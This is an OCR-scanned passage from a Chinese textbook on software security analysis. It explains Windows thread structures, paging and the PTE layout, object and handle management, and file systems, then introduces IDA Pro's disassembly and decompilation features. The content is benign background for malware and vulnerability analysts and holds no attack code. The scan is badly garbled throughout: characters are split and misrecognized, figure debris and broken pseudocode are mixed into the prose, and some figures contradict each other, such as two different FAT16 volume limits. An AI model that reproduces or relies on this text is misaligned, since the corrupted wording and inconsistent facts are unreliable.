相关 的 安全 属性 域 ,最 后 是 与 LPC 消息 和 I/O 请 求 相关 的 域 。 
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映像 基地 址 
模块 列表 
线程 局 部 存储 区 数据 
代码 页 数据 
临界 区 超时 值 
堆 数量 
堆 大 小 
进程 堆 指针 进程 堆 
GDI 共 享 句柄 表 
操作 系统 版 本 号 信息 
映像 版 本 信息 
映像 进程 亲 和 性 掩 码 
2-18 PEB 结构 
KTHREAD 指 针 一 一 一 一 一 >| 内 核 线程 块 KTHREAD 
线程 标识 ID 
创建 时 间 和 退出 时 间 
所 属 进程 ID 
进程 块 指针 -| Eeeocsss | 
线程 启动 地 址 
| wism ] 
身份 模仿 的 信息 
LPC 消 息 的 信息 
定时 器 信息 











图 2-19 ETHREAD 结构 


2. 内 核 线程 块 


内 核 线程 块 KTHREAD 也 是 线程 结构 中 关键 的 数据 结构 ,位 于 系统 内 存 内 核 空间 ， 
包含 了 Windows 内 核 为 正在 运行 的 线程 执行 线程 调度 和 同步 而 需要 访问 的 信息 。 


KTHREAD 的 结构 如 图 2-20 所 示 。 
分 发 器 头 是 内 核 线程 块 的 第 一 个 属性 ,由 


于 线程 是 可 被 等 待 的 对 象 ,因此 需要 一 个 标 


准 的 内 核 分 发 器 对 象 头 用 于 线程 调度 。 总 用 户 时 间 和 内 核 时 间 记 录 了 线程 执行 的 用 户 
CPU 时 间 片 和 内 核 CPU 时 间 片 。 内 核 栈 指针 指向 了 内 核 栈 的 基地 址 和 上 界 地 址 这 些 内 
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系统 服务 指针 “一 一 一 |[ amx | 















































线程 调度 信息 
陷阱 帧 
一 一 一 >|_ 线程 局 部 存储 区 数组 
待 处 理 APC 队 列 
定时 器 块 和 等 待 块 
队列 列表 
TEB 指 针 Pri TEB 








A 2-20 KTHREAD 结构 


核 栈 信息 。 系 统 服务 指针 指向 系统 服务 表 , 随 着 线程 的 运行 状态 变化 ,服务 表 可 以 是 主 系 
统 服务 表 KeServiceDescriptorTable 或 者 Win32k. sys 中 包含 GDI 和 USER 服务 的 服务 
表 。 调 度 信息 包括 线程 的 基本 优先 级 和 当前 优先 级 、 时 限 、 亲 和 性 掩 码 ,理想 处 理 器 、 调 度 
状态 .冻结 计数 和 挂 起 计数 。APC 队列 记录 了 未 处 理 的 用 户 模 式 和 内 核 模式 的 APC 以 
及 可 提醒 的 标志 。 等 待 块 用 于 线程 等 待 特定 事件 ,共有 4 个 ,其 中 一 个 用 于 定时 。 队 列 列 
表 指 向 了 该 线程 关联 的 队列 对 象 。TEB 指针 指向 了 线程 的 线程 环境 块 (TEB) 结 构 。 

3. 线程 环境 块 

线程 环境 块 (TEB) 位 于 进程 的 用 户 地 址 空间 ,记录 了 有 关上 映像 加 载 器 和 Windows 
DLL 的 环境 信息 ,其 包含 的 属性 域 如 图 2-21 所 示 。 

异常 列表 记录 了 线程 的 异常 处 理 方法 集 , 栈 基 址 和 栈 限制 是 线程 栈 空间 的 基本 信息 ， 
子 系 统 指针 指向 了 线程 的 子 系统 块 信息 TIB, 纤 程 块 指 针 指向 了 纤 程 信息 结构 ,PEB 指 
针 指 向 了 线程 所 属 进程 的 PEB 结构 ,WinSock 块 指针 指向 了 线程 包含 的 WinSock 数据 。 
此 外 还 有 线程 ID、LastError ffi 临界 区 计数 、User32 客户 .GDI32、OpenGL、TLS 数组 等 
属性 信息 。 


234 ”内存 管 理 


Windows 32 位 操作 系统 中 , 0x7fffffff 以 下 的 地 址 默认 为 用 户 态 内 存 地 址 ， 
0x80000000 以 上 的 地 址 默认 为 系统 内 核 空 间 地 址 , 即 内 核 空间 和 用 户 空间 分 别 有 2GB 
的 地 址 空间 。 通 过 修改 操作 系统 的 引导 配置 ,可 以 将 内 核 空间 设置 在 0xC0000000 以 上 ， 
用 户 态 内 存 空 间 可 以 增加 到 3GB, 内 核 态 空间 减少 到 1GB。 

Windows 系统 使 用 内 存 管理 器 对 内 存 进行 管理 ,其 主要 负责 两 个 任务 : 将 进程 的 虚 
拟 地 址 空间 转译 到 物理 内 存 ,在 内 存 不 足 时 将 数据 换 页 到 磁盘 。 内 存 管 理 器 是 Windows 
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异常 列表 
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WinSock 数 据 





图 2-21 TEB 结构 


执行 体 的 一 部 分 ,位 于 Ntoskrnl. exe 中 ,由 以 下 组 件 构 成 。 
执行 体系 统 服务 。 负 责 分 配 、 释 放 和 管理 虚拟 内 存 , 以 API 或 者 驱动 接口 的 形式 
提供 服务 。 
异常 处 理 器 。 用 于 解决 硬件 检测 到 的 内 存 管理 异常 问题 ,如 转译 无 效 . 访 问 错误 
陷阱 处 理 器 。 
工作 集 管理 器 。 是 位 于 内 核 的 一 个 系统 线程 ,负责 总 体内 存 管理 策略 ,如 工作 集 
修剪 、 页 面 换 进 换 出 等 。 
进程 / 栈 交 换 器 。 负 责 执行 进程 栈 和 内 核 线程 栈 的 换 入 和 换 出 操作 。 
已 修改 页 面 写 出 器 。 负 责 将 修改 列表 上 的 脏 页 面 写 回 到 适当 的 页 面 文件 中 。 
映射 页 面 写 出 器 。 负 责 将 映射 文件 中 的 脏 页 面 写 到 磁盘 上 ,作为 第 二 个 已 修改 页 
面 写 出 器 ,如 果 只 有 一 个 已 修改 页 面 写 出 线程 , 当 已 修改 页 面 写 出 器 产生 页 面 错 
误 时 ,会 导致 请 求 空闲 页 ,如 果 没 有 空闲 页 ,系统 会 陷 人 “页 面 错误 一 请 求 空 闲 页 
一 页 面 错误 一 请 求 空闲 页 ”的 死 循环 。 
解 引 用 段 线 程 。 负 责 页 面 缓存 的 减少 以 及 页 面 文件 的 增长 和 缩减 。 

。 零 页 面 线程 。 负 责 将 空闲 列表 上 的 页 面 清 零 ,便于 满足 零 页 面 错误 之 需 。 

内 存 管理 器 的 第 一 个 功能 是 虚拟 内 存 地 址 空间 转译 到 物理 内 存 , 其 采用 内 存 分 页 机 
制 实现 管理 ,虚拟 地 址 空间 被 分 成 以 页 面 为 单位 。 页 面 的 大 小 有 两 种 ,大 页 面 和 小 页 面 ， 
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不 同体 系 结构 略 有 差异 ,其 中 x86 架构 下 大 页 面 是 4MB 的 大 小 ,小 页 面 是 4KB 的 大 小 。 
每 个 进程 有 各 种 独立 的 虚拟 内 存 地 址 空间 ,由 各 自 的 页 目录 进行 管理 ,进程 页 目录 的 物理 
地 址 被 保存 在 内 核 进程 块 KPROCESS 中 ,执行 时 会 记录 在 CR3 寄存 器 中 ,x86 系统 上 ， 
Windows 将 页 目录 映射 到 虚拟 地 址 为 0xC0300000 的 位 置 ,内 核 模 式 下 代码 引用 的 地 址 
也 是 虚拟 地 址 ,而 不 是 物理 地 址 ,因为 此 时 已 开启 了 控制 寄存 器 CRO 的 PG 位 , 且 PE 位 
也 被 置 为 1,CPU 处 于 保护 模式 下 的 分 页 寻 址 方式 。x86 架构 下 ,页 目录 可 记录 1024 个 
页 目录 项 ,分 别 对 应 虚拟 地 址 空间 前 10 位 所 能 表示 的 1024 个 内 存 区 ,页 目录 项 记录 的 是 
页 表 的 位 置 和 状态 ,页 表 是 按 需 创建 ,每 个 页 表 可 记录 1024 个 内 存 页 的 位 置 和 状态 属性 ， 
每 个 内 存 页 为 4096B, 即 4KB 的 小 页 内 存 。32 位 的 地 址 按 位 划分 为 3 段 ,分 别 作 为 页 目 
录 索 引 、 页 表 索 引 和 内 存 页 内 字 节 索引 ,如 图 2-22 所 示 , 通 过 逐 级 检索 定位 到 内 存 物 理 地 
址 ,这 一 过 程 由 CPU 硬件 架构 完成 。 













































































31 22 21 12 11 0 
页 目录 索引 页 表 索 引 内 存 页 内 字 节 索引 
KPROCESS 
I I 1 1 
CE | | F=-=-: +- 
| | A | — nu 
L 页 目录 二 二 站 r 一 一 -一 EEVI 
NERKI T cux | RRI ck [Erg 物理 内 存 页 
页 目录 索引 用 户 态 512 个 | 1 | i 
| meesmt| rog | | 
t= rE | :| Le [DEWEY 















































E 2-22 x86 架构 下 地 址 转译 流程 


页 表 项 PTE 除了 前 24 位 的 页 面 帧 编号 用 于 索引 物理 内 存 页 面 外 ,还 有 12 位 用 于 记 
录 页 面 属性 。 如 图 2-23 所 示 , 其 中 U、P、CW 位 保留 ;GL 为 全 局 位 ,如 果 开 启 ,表示 此 页 
面 适用 于 所 有 进程 ;L 位 指明 大 页 面 ,页 面 大 小 4MB;D 位 表示 脏 位 , 即 页 面 被 写 过 ;A 位 
标识 页 面 是 否 已 被 读 过 ;CD 位 标识 该 页 面 是 否 禁止 缓存 ; WT 位 标识 在 写 这 个 页 面 时 是 
和 否 禁 止 缓存 ;O 位 指明 用 户 代码 是 否 可 以 访问 该 页 面 ; W 位 标记 该 页 面 是 否 可 读 写 或 者 
只 读 ;V 位 标识 该 页 面 地 址 转译 是 否 有 效 。 
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图 2-23 PTE 结构 


内 存 管理 器 的 第 二 个 功能 是 在 内 存 不 足 时 将 内 存 数据 换 页 到 物理 磁盘 ,Windows 系 
统 使 用 工作 集 的 方式 对 物理 页 面 进行 管理 。 工 作 集 是 用 于 描述 物理 内 存 中 虚拟 页 面子 集 
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的 术语 ,Windows 系统 中 有 3 种 工作 集 : 

。 进程 工作 集 。 包 含 了 一 个 进程 内 各 个 线程 引用 过 的 页 面 。 

。 系统 工作 集 。 包 含 了 可 换 页 系统 代码 (Ntoskrnl. exe 和 驱动 程序 ) . 换 页 池 和 系统 
缓存 数据 在 内 存 中 驻 留 的 内 存 页 面 。 

会 话 工 作 集 。 包 含 了 Windows 子 系统 的 内 核 模式 部 分 申请 的 会 话 有 关 的 内 核 模 
式 数 据 结 构 、 会 话 换 页 池 、 会 话 映射 视图 ,以 及 其 他 会 话 空 间 设备 驱动 程序 代码 或 
数据 驻 留 的 内 存 页 面 。 

Windows 使 用 了 按 需 换 页 的 管理 方式 ,将 内 存 页 面 聚集 起 来 , 当 有 线程 接收 到 缺 页 
错误 时 ,内 存 管理 器 将 出 错 的 页 面 以 及 该 页 面前 后 的 少量 页 面 一 起 加 载 到 内 存 中 (从 磁盘 
中 换 进 )。 这 种 策略 能 够 尽 可 能 地 将 线程 招致 的 换 页 L/O 次 数 降 到 最 低 , 提 高 运行 效率 。 
在 该 策略 背景 下 ,程序 倾向 于 在 其 地 址 空间 内 的 小 部 分 区 域 中 执行 ,以 便 减少 换 页 时 磁盘 
读 操 作 的 次 数 。 然 而 , 当 一 个 线程 第 一 次 执行 时 ,需要 反复 从 多 个 文件 读 入 一 些 页 面 ,而 
且 可 能 多 个 文件 交替 进行 , 按 需 换 页 的 策略 有 可 能 使 进程 招致 许多 缺 页 错误 。 为 了 优化 
进程 的 启动 过 程 , Windows XP 及 以 后 的 系统 引入 了 智能 预 读 取 引 擎 , 称 为 好 辑 预 读 器 ， 
通过 一 次 预 读 取 批 量 页 面 以 得 到 一 个 更 加 合理 的 访问 顺序 (其 中 没有 过 多 的 来 回 跳动 )， 
从 而 改进 系统 和 应 用 程序 启动 的 整体 性 能 。 


235 ”对象 与 句柄 管理 


Windows 使 用 对 象 模 型 为 执行 体 中 实现 的 各 种 内 部 服务 提供 一 致 的 、 安 全 的 访问 途 
径 , 并 设计 了 对 象 管理 器 负责 创建 ,删除 ,保护 和 跟踪 对 象 。 对 象 管理 器 将 散落 在 操作 系 
统 各 处 的 资源 控制 操作 集中 在 一 起 ,以 提供 一 种 公共 的 ,统一 的 机 制 来 使 用 资源 ,将 对 象 
保护 隔离 到 操作 系统 的 统一 区 域 中 以 提高 安全 等 级 ,提供 一 种 机 制 来 记录 进程 使 用 对 象 
的 数量 ,以 此 对 系统 资源 的 使 用 加 以 限制 ,建立 一 套 对 象 命名 方案 以 使 融合 现 有 的 包括 设 
备 、 文 件 、 目 录 等 对 象 。 

Windows 内 部 有 两 种 类 型 的 对 象 : 执行 体 对 象 和 内 核对 象 。 执 行 体 对 象 是 指 由 执行 
组 件 (进程 管理 器 .内存 管理 器 .IVO 子 系统 ) 所 实现 的 对 象 。 内 核对 象 是 指 由 Windows 
内 核实 现 的 一 组 更 为 基本 的 对 象 ,这 些 对 象 在 用 户 模式 下 是 不 可 见 的 ,它们 在 执行 体内 部 
被 创建 和 使 用 。 执 行 体 对 象 封装 了 一 个 或 多 个 内 核对 象 。 

对 象 由 对 象 头 和 对 象 体 组 成 ,对 象 头 由 对 象 管理 器 控制 ,对 象 体 由 执行 体 组 件 创建 和 
控制 。 如 图 2-24 所 示 ,对象 头 包含 对 象 名 称 、 对 象 目录 安全 描述 符 、 配 额 花 费 \ 已 打开 句 
柄 数 . 已 打开 句柄 列表 、 对 象 类 型 .引用 计数 等 属性 。 对 象 名 称 顾名思义 是 对 象 的 名 称 ,使 
得 对 象 对 于 其 他 进程 可 见 , 便 于 共享 ;对 象 目录 提供 了 一 个 层次 结构 来 存储 对 象 ;安全 描 
述 符 决定 了 哪些 主体 可 以 使 用 该 对 象 ,以 及 允许 它们 如 何 使 用 ;配额 花费 列 出 了 当 一 个 进 
程 打 开 一 个 指向 该 对 象 的 句柄 时 ,针对 该 进程 收取 的 资源 花费 额 ; 已 打开 句柄 计数 记录 了 
“打开 一 个 句柄 来 指向 该 对 象 " 的 次 数 ,该 值 可 以 为 0; 已 打开 句柄 列表 记录 的 是 一 个 进程 
列表 ,该 列表 中 的 进程 都 打开 了 此 对 象 ,列表 可 以 为 空 ;对 象 类 型 是 一 个 指针 ,指向 了 一 个 
被 称 为 类 型 对 象 的 特殊 对 象 .该 对 象 包含 的 信息 对 于 它 的 每 个 实例 都 是 共用 的 ;引用 计数 
记录 了 一 个 内 核 模式 组 件 引 用 该 对 象 地 址 的 次 数 ,该 值 为 0 时 对 象 将 被 释放 。 对 象 体 包 
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含 对 象 特有 的 数据 ,其 格式 和 内 容 只 有 这 种 对 象 类 型 才 有 ,同一 类 型 的 对 象 共享 同样 的 对 















































象 体格 式 。 
一 
对 象 名 称 
对 象 目录 
安全 描述 符 [am] 
HRK 配额 花费 ec 
已 打开 句柄 计 数 C 
已 打开 句 栖 列表 
一 | -| 类 型 名 
rS -- 
访问 类 型 
通用 访问 权限 喘 时 关系 
w*i( warna ) 方法 : open. close. delete, parse 
图 2-24 ”对象 结构 


当 一 个 进程 根据 名 称 来 创建 或 者 打开 对 象 时 ,系统 返回 一 个 句柄 ,进程 需要 根据 该 句 
柄 对 该 对 象 进行 访问 和 管理 。 对 象 句 柄 是 一 个 索引 ,指向 与 对 象 相关 的 句柄 表 中 的 表 项 ， 
通过 句柄 访问 对 象 比 直接 使 用 名 称 访问 对 象 高 效 ,因为 对 象 管理 器 可 以 跳 过 名 称 查找 过 
程 直接 找到 目标 对 象 。 进 程 也 可 以 在 其 创建 时 刻 通 过 继承 句柄 的 方式 来 获取 句柄 或 者 从 
另 一 个 进程 接收 一 个 复制 的 句柄 。 用 户 模式 下 的 执行 代码 在 使 用 对 象 之 前 必须 拥有 一 个 
指向 该 对 象 的 句柄 ,句柄 作为 指向 系统 资源 的 间接 指针 。 

Windows 32 位 系统 下 的 句柄 表 项 由 两 个 32 位 成 员 的 结构 组 成 ,一 个 是 指向 对 象 的 
指针 (包含 一 些 标志 ) , 另 一 个 是 访问 掩 码 。 如 图 2-25 所 示 ,32 位 的 对 象 指针 包含 了 28 位 
指向 对 象 头 指针 和 4 个 标志 ,由 于 对 象 总 是 8 字 节 对 齐 , 所 以 该 结构 单元 的 低 3 位 作为 标 
志 位 , 表 项 的 P 位 标识 是 否 允 许 关 闭 该 句柄 ,I 位 标识 句柄 是 否 可 继承 ,A 位 标识 关闭 该 
句柄 时 是 否 进 行 审 计 。 表 项 的 最 高 位 L 位 被 当成 锁 位 ,这 是 因为 对 象 结构 总 处 于 内 核 高 
地 址 区 (0x80000000 以 上 )。 作 为 指针 时 ,L 位 置 成 1 表示 使 用 ,能 够 得 到 正确 的 地 址 ;该 
位 置 0 时 表示 被 锁 住 ,禁止 使 用 。 
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图 2-25 句柄 表 项 结构 
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236 文件 系统 


文件 系统 是 操作 系统 中 对 文件 存储 设备 的 空间 进行 组 织 和 分 配 , 负 责 文件 存储 并 对 
存 人 的 文件 进行 保护 和 检索 的 系统 ,包括 为 用 户 提供 创建 文件 , 读 和 人、 修改 ,存储 文件 等 具 
体 功能 。Windows 操作 系统 包含 对 CDFS,UDF,FATI2.FATI6,FAT32,NTFS 这 些 文 
件 系统 格式 的 支持 ,不 同 的 格式 适用 于 不 同 的 特定 环境 。 

CDFS 是 一 个 只 读 文件 系统 ,支持 ISO-9660 格式 和 Joliet 格式 。ISO-9660 格式 的 系 
统 最 大 长 度 为 32 字符 的 ASCII 大 写 文件 名 。Joliet 格式 支持 任意 长 度 Unicode 文件 名 ， 
文件 大 小 最 大 4GB, 最 多 65 535 个 目录 。CDFS 目前 已 成 为 历史 ,工业 界 采 用 UDF 作为 
只 读 介质 的 标准 。 

UDF 文件 系统 是 工业 上 只 读 文件 系统 的 标准 ,支持 ISO-13346 格式 ,主要 应 用 于 
DVD-ROM, UDF 的 文件 系统 支持 目录 和 文件 名 可 达 254 字符 的 ASCII 码 或 者 127 字 
符 的 Unicode 字符 ,文件 可 以 是 稀 朴 的 ,文件 大 小 用 64 位 表示 ,可 以 超过 AGB. 

FAT 文件 系统 是 Windows 系统 为 了 兼容 其 他 老 版 本 Windows 系统 而 使 用 的 一 种 
磁盘 格式 。 其 中 ,FAT12 的 12 位 得 标识 符 限 定 了 一 个 分 区 最 多 只 能 存储 4096 E, RAI 
大 小 从 512B 到 8KB 范围 ,FAT16 卷 的 大 小 最 大 支持 32MB, 早 期 的 5 英寸 软盘 和 3.5 英 
才 软 盘 就 使 用 了 FAT12 格式 ,这 些 软盘 最 大 支持 1. 44MB 数据 。 FAT16 使 用 16 IRER 
识 符 , 可 以 处 理 65 536 个 簇 , 簇 的 大 小 从 512B 到 64KB. FATI6 卷 的 大 小 最 多 支持 
4GB。FAT32 是 最 新 定义 的 基于 FAT 的 文件 系统 格式 ,使 用 32 位 秘 标 识 符 ,保留 了 高 4 
位 ,实际 使 用 28 位 , 簇 大 小 从 512B 到 32KB, 理 论 上 可 支持 最 大 8TB 的 卷 。FAT32 文件 
系统 下 最 大 的 单个 文件 不 能 超过 4GB。 

NTFS 文件 系统 是 Windows 的 原生 文件 系统 格式 ,使 用 64 位 艇 编号 ,使 得 NTFS 能 
够 支持 高 达 16EB 的 卷 ; 但 是 Windows 限制 NTFS 卷 的 大 小 为 “可 用 32 位 簇 来 寻 址 的 卷 
大 小 ”,NTFS 的 实现 限制 了 文件 最 大 尺寸 为 16TB。NTFS 引入 了 文件 和 目录 安全 性 、 磁 
盘 配 额 文件 压缩 .基于 目录 的 符号 链接 加密 、 可 恢复 等 高 级 特性 。NTFS 的 可 恢复 性 是 
为 了 解决 “可 靠 的 数据 存储 和 数据 访问 ”的 需求 ,使 用 了 原子 的 事务 处 理 方案 来 实现 可 恢 
复 性 ,能 够 确保 发 生 电源 故障 或 者 系统 失败 时 文件 系统 操作 不 会 遗留 在 未 完成 的 状态 , 磁 
盘 卷 的 结构 能 够 完好 无 损 。 


2.4 小 z 


本 章 从 处 理 器 硬件 架构 、 反 汇编 与 反 编译 、Windows 操作 系统 这 3 个 方面 介绍 恶意 
代码 分 析 与 软件 漏洞 分 析 需 要 掌握 的 基本 知识 ,为 后 续 的 学 习 研 究 工 作 英 定 基础 。 从 事 
软件 安全 分 析 这 一 工作 需要 掌握 的 知识 较 多 ,限于 篇 幅 无 法 在 本 书 一 一 介绍 ,本 书 介绍 的 
基础 知识 也 只 能 起 到 提纲 者 领 的 作用 ,更 多 更 深入 的 细节 需要 读者 阅读 专门 的 资料 深入 
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软件 安全 分 析 基 础 工具 


“ 工 欲 善 其 事 , 必 先 利 其 器 。? 掌 握 软件 安全 分 析 基 础 工具 是 从 事 恶 意 代码 分 析 、 软 件 
漏洞 分 析 工 作 必 不 可 少 的 基本 技能 。 本 章 从 静态 分 析 动态 分 析 、 虚 拟 化 分 析 3 个 方面 对 
软件 安全 分 析 基 础 工具 进行 介绍 ,以 Windows 平台 为 主 ,适当 穿插 同类 型 的 Linux, 
Android 平台 的 相关 工具 。 


3.1 静态 分 析 工 具 


静态 分 析 是 指 在 不 运行 软件 程序 的 情况 下 ,利用 分 析 工 具 , 采 用 语法 分 析 、 词 法 分 析 、 
控制 流 与 数据 流 分 析 等 技术 手段 对 软件 程序 进行 扫描 。 静 态 分 析 无 须 执行 软件 程序 , 具 
有 分 析 速 度 快 、 代 码 覆 盖 率 高 .平台 兼容 性 好 (PC 平台 也 能 扫描 Android 平台 的 软件 ) 等 
优势 ,但 在 恶意 代码 检测 方面 有 较 高 的 误 报 率 。 当 前 学 术 界 与 工业 界 已 有 大 量 的 静态 分 
析 工 具 , 可 分 为 逆向 反 汇编 工具 和 文件 格式 分 析 编 辑 工 具 。 其 中 常见 的 逆向 反 汇编 工具 
及 引擎 包括 IDA Pro、Udis86、Capstone 等 ,这 些 工具 对 程序 进行 静态 反 汇 编 ,结合 符号 库 
提取 相关 语义 。 常 见 的 文件 格式 分 析 编 辑 工具 包括 PEiD、LoadPE、010Editor、WinHex 
等 ,这 些 工具 用 于 提取 PE 文件 格式 、 加 过 分 析 、 脱 壳 处 理 、 格 式 分析 以 及 二 进 制 文件 
编辑 。 


31.1 IDA Pro 


IDA Pro 是 一 款 交 互 式 的 反 汇 编 工 具 , 简 称 IDA, 是 由 比利时 的 Hex-Rayd 公司 于 
1996 年 发 布 的 商业 付费 软件 ,已 有 将 近 20 年 历史 ,至 今 仍 在 不 断 更 新 ,支持 Windows, 
Linux, Mac OS 等 主流 操作 系统 平台 ,支持 Intel x86/x64, ARM, MIPS 等 数 十 种 指令 集 
的 反 汇 编 。 

IDA 支持 各 种 文件 类 型 程序 的 分 析 , 包 括 exe, dll, elf so, dex 等 ,具有 良好 的 交互 
性 ,提供 反 汇 编 窗 口 IDA. View. 十 六 进 制 代码 窗口 Hex View、 函 数 窗口 Functions、 导 入 
KAN Imports, FRAN Exports 等 ,同时 IDA 具有 可 扩展 性 ,可 自 定义 插件 进行 扩 
展 ,被 广泛 用 于 程序 的 静态 分 析 。 以 下 介绍 IDA 的 常用 功能 。 

1. 反 汇 编 功 能 

反 汇 编 是 IDA 最 基本 的 功能 ,通过 反 汇 编 将 十 六 进 制 机 器 码 转化 为 汇编 语言 代码 。 
IDA 使 用 了 递归 下 降 算法 进行 代码 扫描 , 比 线性 扫描 算法 效率 高 , 反 汇 编 的 结果 能 够 以 
不 同 的 形式 进行 展示 ,包括 控制 流 图 的 形式 和 地 址 顺序 排列 的 形式 ,通过 在 IDA. View-A 
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窗口 按 空格 键 可 以 切换 展示 的 形式 ,如 图 3-1 所 示 。 
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(a) 反 汇 编 控制 流 图 显示 











(b) 反 汇编 地 址 顺序 显示 


图 3-1 IDA 反 汇 编 结 果 的 展示 形式 


2. 反 编译 功能 

新 版 本 的 IDA 增加 了 反 编 译 等 功能 ,加 强 了 分 析 能 力 。 在 IDA View 窗口 下 指定 汇 
编 代码 , 按 快捷 键 F5,IDA 会 将 所 在 位 置 的 汇编 代码 反 编 译 成 C/C++ 形式 的 代码 ,并 在 
Pseudocode 窗口 中 显示 ,如 图 3-2(a) 所 示 。 反 编译 功能 并 不 一 定 能 成 功 , 也 有 失败 的 情 
况 , 如 图 3-2(b) 所 示 , 对 vmp 混淆 后 的 代码 碎片 进行 反 编译 时 失败 。 








Bomvoueon| 





oid —stdcall jpeg datasrc::Skipba 


int32 v2; // edigi 
int v3; // ebxg2 
int và; // esiG2 


v2 = a2; 
if (32> 9) 
v3 = e(( DWORD =)a1 + 6); 
vh» vd * M; 
while ( v2 > «( DUORD «u^ ) 


u2 == e( DUORD «un; 
jpeg datasrc::FillBurFer(a1); 


"( DWORD =)u3 += v2; 
(CDWORD -)uh -- v2; 





19| > 
2o) 1 











np: O005B21 loc M5821: 5 CODE XREI 
J: 00305821 


Peate reler to the manual to fnd appropriate actors 


Cx] 


5828 |. [C Dont display this message again (for this session only) 








(a) IDA 反 编译 得 到 的 代码 


(b) IDA 反 编译 失败 


图 3-2 IDA 反 编译 结果 图 


3. 导入 表 与 导出 表 解 析 功 能 

导入 表 和 导出 表 是 PE 结构 中 的 重要 信息 结构 。 导 入 表 记 录 了 程序 需要 调用 ,但 执 
行 代码 又 不 在 程序 中 而 在 其 他 动态 库 文件 Cdll/so) 的 函数 中 ;导出 表 是 动态 库 文 件 所 特 
有 的 ,记录 了 供 其 他 动态 库 或 程序 模块 调用 的 函数 。IDA 的 导入 表 与 导出 表 函 数 的 解析 
功能 具备 提取 导入 表 的 地 址 、 函 数 名 动态 库 名 等 参数 和 导出 表 的 地 址 、 函 数 名 、Ordinal 
等 参数 ,如 图 3-3 所 示 。 导 入 表 和 导出 表 信息 是 实现 API 支持 需要 获取 的 信息 ,通过 IDA 
的 分 析 功 能 能 够 帮助 分 析 人 员 实 现 针 对 APT HOOK, 

4. 函数 符号 表 功 能 

IDA 能 够 加 载 pdb 格式 的 符号 库 , 通 过 符号 库 能 够 解析 出 大 量 的 函数 符号 信息 ,无 
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(a) 导入 表 (b) 导出 表 
图 3-3 IDA 提取 导入 表 与 导出 表 


符号 的 情况 下 IDA 会 将 函数 命名 为 sub_[address] 的 格式 ,这 些 信息 分 布 于 Function 
name 窗口 ` 反 汇编 和 反 编 译 的 窗口 ,通过 符号 信息 提供 更 多 的 语义 用 于 逆向 分 析 。 图 3-4 
是 在 导入 符号 库 和 未 导入 符号 库 两 种 情况 下 获取 的 函数 信息 ,虽然 符号 库 不 能 保证 获取 
所 有 函数 的 符号 ,但 这 些 获取 的 函数 符号 在 逆向 分 析 过 程 中 能 够 提高 分 析 的 效率 和 准确 
度 。 对 于 无 法 获取 的 函数 名 ,用 户 在 手工 分 析 后 可 自行 修改 添加 。 























[re vindov retins windo 
Function name Segment Sart lengh Locals Arguments | Funcion name  Segm Start Length Locals Arguments 
GpipegDecoder:Ter.. text 70EIAAAS 0000006  0000002C 00000004 aub TOEIAAA5 tent TOEN (00002 00000904 
GpJpegDecoderzinit. text 70E1A973 00000132 00000030 00000008 sub 70E1A973 text 70E1A973 00000132 00000030 00000008 
jpeg.datesrczjpeg.da.. text 70E1A934 0000003F 00000000 00000004 sub.70E1A934 text 70EU SF — 00000000 00000004 
Gp)pegDecoder:Pass.. text 0E", 0000009F — 0000000C 00000004 sub text 0000009F — 0000000C 00000004 
GpipegDecoder:Cha.. text 70t1A819  0000007C 00000014 00000010 sub 70t1A819 text 70E1AB19 0000007C — 00000014 00000010 
GplpegDecodersClea text 70E1A7D1 00000048 0000000 00000000 ub.OEIATD! ex 7OEtA7D! 00000048 — 0000000C 
GplpegDecoder;Sel. text  — 7E1A703 。 000000CE 0000000C 00000014 sub-7OE1A703 eit 7OE1A703 000000CE  O000000C 00000014 
GplpegOscoderzfem. sext TOEIA692 。 00000071 00000008 sub- "ew 7OEIAGS2 00000071 — 00000004 
GpipegDecoderzGet. text TOE1ASBE 00000004 00000010 00000010 sub 7OETASBE text 7OE1ASBE 00000004 — 00000010 00000010 
GpipegDecoder:Get. text 70EIAS68 。 00000053 0000000C ob TOEIA568 tent 00000053 。 0000000C 
;ipJpegDecoderzGet.. text TOETA4C! — O00000AA 00000004 00000010 Sub.70E1A4C! text 7OE1A4C1 0000004A — 00000004 00000010 
pipegDecoder:Get. text  JOEA4SE 00000063 00000004  O000000c sub -TOE1A45E tet JOE1AASE 00000063 00000004  0000000C 
ippegDecoder:Get. text 7OEIA3EF 。 0000006F 00000004 。 0000000C P et TOEIA3EF 0000006 00000004 0000000C 
GplpegDecoderzGet text  70EIA38S 00000034 00000004 00000008 ub.OEIAGBS iex 70EIA3B5 0000003 0000004 0000008 
GplpegDecoderzpeg.. text (A228 S0000018D 00000014 00000008 sub. "tex TOEIAZ28 0000018D 00000014 00000008 
iPpegDecoderspeg. text 7OE1A198  0000009D 00000010 00000006 Sub.7OEiATGB tert 7OETATSB 00000086D 00000010 00000008 
GplpegDecoder:Uns-. text 70E1A0D3  000000CB 00000008 00000004 aub TOEIA0D3 tert 7OE1AOD3 000000CB 00000008 00000004 
plpegDecoderjpeg. text 70E19F73 00000160 00000058 00000006 Sub-70E19F73 ew 70E19F73 00000160 00000058 00000008 
pipegDecodersam.. text 7OEIOFZ7  0000004C 。 0000000C O000000C aub-TOE19F27 tet 701927 0000004  O000000C =0000000C 
E19c52 edt TOE19C52 00000205 00000030 00000004 sub -70E19C52 tert 7OEISCS2 00000205 00000030 00000004 
nensionval tert — 70EH 0000004F 。 0000000C 00000010 4b.]0E19CO3 sext 70E19C03 0000004F 。 0000000C 00000010 
NeedlmBottomtdg. text 70E19889 00000044 00000008 00000004 sub 70E19889 tert 70E198B9 00000044 00000008 00000004 
(a) 导入 符号 库 获取 函数 名 (b) 未 导入 符号 库 无 函数 名 
图 3-4 IDA 函数 信息 获取 
s. 查找 功能 


查找 也 是 IDA 的 一 项 特色 功能 ,包括 基本 的 文本 查找 和 引用 查找 。 文 本 查找 支持 反 
汇编 窗口 的 指令 查找 ,符号 查找 、 地 址 查找 等 ,支持 十 六 进 制 机 器 码 窗口 的 机 器 指令 查找 ， 
支持 导入 表 与 导出 表 窗 口 的 函数 查找 等 。 引 用 查找 是 用 来 搜索 代码 上 下 文 的 一 项 功能 技 
巧 ,目的 是 检索 代码 的 前 序 模 块 和 后 续 模 块 ,通过 引用 查找 能 够 分 析 代 码 可 能 从 哪些 模块 
跳 转 进来 和 后 续 可 能 执行 到 哪些 模块 。 例 如 ,从 图 3-5 可 见 , 通 过 前 向 引用 查找 获取 了 能 
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够 跳 转 到 loc_70e18266 位 置 的 5 处 代码 ,查找 出 来 的 结果 少 了 顺序 执行 到 该 位 置 的 
情况 。 


Direction Typ Address 
bj Up j G 


E Up j jmp 


W Up j  GpB jmp 


ES up j GpBmpEncoder:WriteHeader(ColorPalette const )+139 jmp short loc_70E18266 
